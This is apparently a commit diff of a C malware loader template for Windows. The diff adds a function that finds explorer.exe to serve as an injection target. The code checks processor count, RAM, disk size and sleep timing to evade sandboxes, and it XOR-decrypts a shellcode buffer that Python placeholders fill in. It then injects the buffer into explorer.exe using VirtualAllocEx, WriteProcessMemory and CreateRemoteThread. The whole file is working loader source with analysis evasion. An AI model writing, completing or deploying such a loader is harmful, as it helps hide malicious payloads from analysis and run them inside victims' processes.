22#include <windows.h>
33#include <stdio.h>
44#include <time.h>
5+ #include <tlhelp32.h>
56
67unsigned long get_time ()
78{
@@ -11,6 +12,44 @@ void compute_ftp()
1112{
1213 return ;
1314}
15+
16+ int findMyProc (const char * procname )
17+ {
18+
19+ HANDLE hSnapshot ;
20+ PROCESSENTRY32 pe ;
21+ int pid = 0 ;
22+ BOOL hResult ;
23+
24+ // snapshot of all processes in the system
25+ hSnapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS , 0 );
26+ if (INVALID_HANDLE_VALUE == hSnapshot )
27+ return 0 ;
28+
29+ // initializing size: needed for using Process32First
30+ pe .dwSize = sizeof (PROCESSENTRY32 );
31+
32+ // info about first process encountered in a system snapshot
33+ hResult = Process32First (hSnapshot , & pe );
34+
35+ // retrieve information about the processes
36+ // and exit if unsuccessful
37+ while (hResult )
38+ {
39+ // if we find the process: return process ID
40+ if (strcmp (procname , pe .szExeFile ) == 0 )
41+ {
42+ pid = pe .th32ProcessID ;
43+ break ;
44+ }
45+ hResult = Process32Next (hSnapshot , & pe );
46+ }
47+
48+ // closes an open handle (CreateToolhelp32Snapshot)
49+ CloseHandle (hSnapshot );
50+ return pid ;
51+ }
52+
1453int main (void )
1554{
1655 const char sig_evade [] = "// PYTHON_REPLACE_ME_HERE_1" ;
@@ -19,19 +58,20 @@ int main(void)
1958 GetSystemInfo (& systemInfo );
2059 DWORD numberOfProcessors = systemInfo .dwNumberOfProcessors ;
2160 printf ("Processors: %d\n" , numberOfProcessors );
22- if (numberOfProcessors < 2 ) {
61+ if (numberOfProcessors < 2 )
62+ {
2363 compute_ftp ();
2464 return 0 ;
2565 }
26-
2766
2867 // check RAM
2968 MEMORYSTATUSEX memoryStatus ;
3069 memoryStatus .dwLength = sizeof (memoryStatus );
3170 GlobalMemoryStatusEx (& memoryStatus );
3271 DWORD RAMMB = memoryStatus .ullTotalPhys / 1024 / 1024 ;
3372 printf ("Memory: %d\n" , RAMMB );
34- if (RAMMB < 2048 ) {
73+ if (RAMMB < 2048 )
74+ {
3575 compute_ftp ();
3676 return 0 ;
3777 }
@@ -44,15 +84,16 @@ int main(void)
4484 DWORD diskSizeGB ;
4585 diskSizeGB = pDiskGeometry .Cylinders .QuadPart * (ULONG )pDiskGeometry .TracksPerCylinder * (ULONG )pDiskGeometry .SectorsPerTrack * (ULONG )pDiskGeometry .BytesPerSector / 1024 / 1024 / 1024 ;
4686 printf ("Disk space: %d\n" , diskSizeGB );
47- if (diskSizeGB < 70 ) {
87+ if (diskSizeGB < 70 )
88+ {
4889 compute_ftp ();
4990 return 0 ;
5091 }
5192
5293 unsigned long start = get_time ();
5394 Sleep (2000 );
5495 unsigned long end = get_time ();
55- printf ("Diff: %d\n" , end - start );
96+ printf ("Diff: %d\n" , end - start );
5697 if ((end - start ) != 2 )
5798 {
5899 compute_ftp ();
@@ -64,19 +105,19 @@ int main(void)
64105 // PYTHON_REPLACE_ME_HERE_2
65106 const char key [] = // PYTHON_REPLACE_ME_HERE_3
66107
67- for (int i = 0 ; i < sizeof (buf ); i ++ )
108+ for (int i = 0 ; i < sizeof (buf ); i ++ )
68109 {
69110 buf [i ] = buf [i ] ^ key [i % (sizeof (key ) - 1 )];
70111 }
71- int migrateToPID = // PYTHON_REPLACE_ME_HERE_4
112+ int migrateToPID = findMyProc ( "explorer.exe" );
72113 HANDLE hProcess = OpenProcess (0x001F0FFF , 0 , migrateToPID );
73114 int i = 0 ;
74115 HANDLE addr = VirtualAllocEx (hProcess , & i , 0x1000 , 0x3000 , 0x40 );
75116
76117 size_t outSize ;
77118 size_t j = 0 ;
78119 WriteProcessMemory (hProcess , addr , buf , sizeof buf , & outSize );
79- int * threadId = CreateRemoteThread (hProcess , 0 , 0 , addr , & i , 0 , 0 );
120+ int * threadId = CreateRemoteThread (hProcess , 0 , 0 , addr , & i , 0 , 0 );
80121 }
81122 return 0 ;
82123}
0 commit comments